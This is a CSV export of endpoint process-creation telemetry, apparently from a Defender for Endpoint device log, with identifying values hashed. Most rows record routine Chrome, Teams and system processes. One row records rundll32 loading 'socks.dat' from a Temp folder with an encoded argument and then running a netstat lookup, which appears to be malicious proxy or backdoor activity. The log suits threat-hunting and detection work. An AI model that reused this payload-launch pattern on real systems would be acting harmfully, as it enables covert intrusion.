01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+223,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:59:09.023342400+00:00,9016,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6804 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:59:09.129884700+00:00,2021-06-23 02:59:36.215398300+00:00,ec440b88-059e-4d3c-a899-429478a53fc7,computerpii_0a470890c60768167990033d701e7bd881398861,160229,False,10.7740.19041.1052,False,11540474045171838,,11540474045172876,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,18560,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+224,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:16:28.143728100+00:00,17360,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""4900""""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 01:01:01.746618400+00:00,13732,rundll32.exe,"""rundll32.exe"" C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\socks.dat,#1 ekaneR12ATiPgB7C3Dr4+At9Lf4ljqq/fA/K4LYq42JQQo2BrDWbpw==",False,2021-06-24 00:59:43.689127700+00:00,9244,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:16:28.170946400+00:00,2021-06-24 07:16:43.472854400+00:00,02c7f094-5303-450e-ba47-4a53173c4809,computerpii_0a470890c60768167990033d701e7bd881398861,176928,False,10.7740.19041.1052,False,11540474045175422,,11540474045177051,2021-06-24 01:01:01.746618400+00:00,13732,2021-06-24 01:01:01.746618400+00:00,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,13732,128,ActiveProcessStartkey,C:\Windows\System32,71680,2103-08-07 22:53:31+00:00,2021-02-17 04:35:14.392957300+00:00,2021-06-24 00:54:21.245734700+00:00,2021-02-17 04:35:14.391957+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,1.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32),Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+225,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:16:28.150604600+00:00,3676,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 07:16:28.143728100+00:00,17360,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""4900""""",False,2021-06-24 01:01:01.746618400+00:00,13732,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:16:28.171214200+00:00,2021-06-24 07:16:43.472888200+00:00,ccb6976e-07bc-47a1-8ae7-0fa4ce6b3933,computerpii_0a470890c60768167990033d701e7bd881398861,176929,False,10.7740.19041.1052,False,11540474045177051,,11540474045177052,2021-06-24 07:16:28.143728100+00:00,17360,2021-06-24 07:16:28.143728100+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,17360,128,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 06:26:14.590206500+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,257.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+226,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:16:28.247031800+00:00,16096,NETSTAT.EXE,netstat  -ano ,PortableExecutable,2019-12-07 09:09:34.006180900+00:00,C:\Windows\System32\NETSTAT.EXE,39936,7fddd6681ea81ce26e64452336f479e6,b094e827af70241d71bed9767ec1a254fdc4164a646b2ba4c7105cd783adba0d,c038069021cea437ae40b421929e9d4d1a3440b3,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 07:16:28.143728100+00:00,17360,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""4900""""",False,2021-06-24 01:01:01.746618400+00:00,13732,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:16:28.361328900+00:00,2021-06-24 07:16:43.472922+00:00,44f7c52a-691a-4ee6-8e1c-6e4bf3b41c63,computerpii_0a470890c60768167990033d701e7bd881398861,176930,False,10.7740.19041.1052,False,11540474045177051,,11540474045177053,2021-06-24 07:16:28.143728100+00:00,17360,2021-06-24 07:16:28.143728100+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,17360,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 06:26:14.590206500+00:00,2021-02-17 04:34:58.875918800+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,257.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,netstat.exe,netstat.exe,TCP/IP Netstat Command
+227,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:16:28.258682400+00:00,15652,find.exe,"find  ""4900""",PortableExecutable,2019-12-07 09:09:37.707866+00:00,C:\Windows\System32\find.exe,17920,ae3f3dc3ed900f2a582bad86a764508c,1a1876c5eed2b8cd9e14ebff3f4eeb7e21552a4c6aab4bf392a55f8df3612dab,1e44ee63bdb2cf3a6e48b521844204218a001344,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 07:16:28.143728100+00:00,17360,cmd.exe,"""cmd.exe"" /c ""netstat -ano | find ""4900""""",False,2021-06-24 01:01:01.746618400+00:00,13732,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:16:28.363436800+00:00,2021-06-24 07:16:43.472957+00:00,40a49027-6ca3-4a01-9308-64f31d770a84,computerpii_0a470890c60768167990033d701e7bd881398861,176931,False,10.7740.19041.1052,False,11540474045177051,,11540474045177054,2021-06-24 07:16:28.143728100+00:00,17360,2021-06-24 07:16:28.143728100+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,17360,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 06:26:14.590206500+00:00,2021-02-17 04:34:58.875918800+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,0.0,257.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,find,FIND.EXE,Find String (grep) Utility
+228,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:19:17.644752200+00:00,16816,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7240 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:19:18.619253900+00:00,2021-06-24 02:20:26.544005200+00:00,f0d1dad3-43f9-4dbf-8220-42e137231630,computerpii_0a470890c60768167990033d701e7bd881398861,173103,False,10.7740.19041.1052,False,11540474045175164,,11540474045175972,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+229,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 02:19:48.463954900+00:00,20456,LogonUI.exe,"""LogonUI.exe"" /flags:0x0 /state0:0xb3beb855 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 11:04:14.036541300+00:00,11720,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-23 11:04:13.923843100+00:00,14724,smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:19:48.656552500+00:00,2021-06-24 02:20:26.544156400+00:00,876e7de1-bf5f-447c-949b-b1bed1f490e2,computerpii_0a470890c60768167990033d701e7bd881398861,173105,False,10.7740.19041.1052,False,11540474045175072,,11540474045175973,2021-06-23 11:04:14.036541300+00:00,11720,2021-06-23 11:04:14.036541300+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,11720,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-23 11:04:14.025533400+00:00,2021-04-14 01:10:22.046876900+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+230,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 08:03:00.685325500+00:00,9260,Video.UI.exe,"""Video.UI.exe"" -ServerName:Microsoft.ZuneVideo.AppX758ya5sqdjd98rx6z7g95nw6jy7bqx9y.mca",PortableExecutable,2021-03-03 01:05:36.930482800+00:00,C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21021.10311.0_x64__8wekyb3d8bbwe\Video.UI.exe,26158592,283dc76be1b3e114b2f760cbe98887b4,55c8256d0811dce971b006391730d60d7f310eb9ffd84153fe898d3fd4f16fc1,b10bd0842d702b615f71d886d431637655267e76,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 08:03:00.824474100+00:00,2021-06-23 08:05:27.804947800+00:00,a610ad43-9321-4725-abe9-f8cf145f78bb,computerpii_0a470890c60768167990033d701e7bd881398861,165478,False,10.7740.19041.1052,False,11540474045136908,,11540474045174289,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,svchost.exe,504,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,,,,,,
+231,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:05:18.976948+00:00,20068,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:05:19.482607600+00:00,2021-06-23 01:07:20.614690700+00:00,33267233-ba95-476e-9002-e10c9210d700,computerpii_0a470890c60768167990033d701e7bd881398861,156281,False,10.7740.19041.1052,False,11540474045171817,,11540474045172109,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+232,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:05:35.179968600+00:00,18324,SenseCncProxy.exe,828,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:05:35.434963400+00:00,2021-06-23 01:07:20.615101900+00:00,56c41b72-c24a-416d-bb01-5d48284be1a1,computerpii_0a470890c60768167990033d701e7bd881398861,156290,False,10.7740.19041.1052,False,11540474045137006,,11540474045172110,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+233,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:05:41.366437500+00:00,3768,dmclient.exe,dmclient.exe utcwnf,PortableExecutable,2021-02-17 04:34:43.547067+00:00,C:\Windows\System32\dmclient.exe,121344,fd408cadc0abf7d23d62fb913ba5f02e,3d97cab2179c3ab9c975808a12c97a9a06d672b180ae04880ddffe69925aaeff,0dbc874851094dd496e0a2df6226b6b0b5f1ac95,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:05:41.634228600+00:00,2021-06-23 